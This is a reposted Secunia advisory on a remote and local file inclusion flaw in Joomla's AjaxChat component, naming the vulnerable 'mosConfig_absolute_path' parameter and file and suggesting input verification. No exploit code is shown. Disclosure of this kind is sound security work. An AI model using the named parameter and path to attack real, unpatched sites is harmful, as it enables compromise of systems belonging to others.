Joomla AjaxChat Component File Inclusion Vulnerability 

SECUNIA ADVISORY ID:
SA37087

VERIFY ADVISORY:
http://secunia.com/advisories/37087/

DESCRIPTION:
kaMtiEz has reported a vulnerability in the AjaxChat component for
Joomla, which can be exploited by malicious people to compromise a
vulnerable system.

Input passed to the "mosConfig_absolute_path" parameter in
/components/com_ajaxchat/tests/ajcuser.php is not properly verified
before being used to include files. This can be exploited to include
arbitrary files from local or external resources.

SOLUTION:
Edit the source code to ensure that input is properly verified.

PROVIDED AND/OR DISCOVERED BY:
kaMtiEz

ORIGINAL ADVISORY:
http://packetstormsecurity.org/0910-exploits/joomlaajaxchat-rfi.txt

DOWNLOAD
JOOMLA!

Download Joomla!

Joomla! 4.x Thai Translation Language Packs

Joomla! 3.x Thai Translation Language Packs

OUR NETWORK


CMSPlugin.com
Joomla Extensions, Joomla Templates

Joomla!® User Group Thailand
Joomla!® User Group Thailand


Marvelic Engine Co., Ltd. รับพัฒนาเว็บไซต์ด้วย Joomla! , รับอบรม Joomla , ผู้เชี่ยวชาญ จูมล่า
รับทำเว็บ Joomla, อบรบ Joomla

Ribbon